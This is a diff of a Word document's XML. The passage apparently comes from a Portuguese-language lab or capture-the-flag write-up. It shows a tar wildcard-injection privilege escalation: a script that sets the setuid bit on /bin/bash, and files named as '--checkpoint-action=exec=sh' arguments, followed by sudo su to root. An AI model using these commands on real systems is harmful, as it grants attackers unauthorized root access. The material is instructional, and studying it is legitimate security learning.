+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>.sh"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>Comando usado:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-builtin"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>echo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="hljs-string"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:spacing w:val="-5"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt;&gt; --checkpoint=1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="242424"/>
@@ -6356,9 +4873,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>www</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -6368,561 +4883,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>html</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Comando usado: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>printf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>#!/</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>\</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>nchmod</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> +s /bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt; privesc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Comando usado: </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>""</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>"-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>-checkpoint-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>action</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>exec</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>sh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> privesc</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>.sh"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:i/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-builtin"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>echo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="hljs-string"/>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t>""</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:spacing w:val="-5"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> &gt;&gt; --checkpoint=1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Entre no diretório do </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>miles</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> novamente e execute o comando </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>su</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> para poder ter acesso root.</w:t>
+        <w:t>Entre no diretório do miles novamente e execute o comando sudo –su para poder ter acesso root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6958,31 +4920,7 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l</w:t>
+        <w:t xml:space="preserve"> sudo -l</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7018,45 +4956,8 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="242424"/>
-          <w:spacing w:val="-1"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="30"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>su</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> sudo su</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7318,7 +5219,7 @@
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
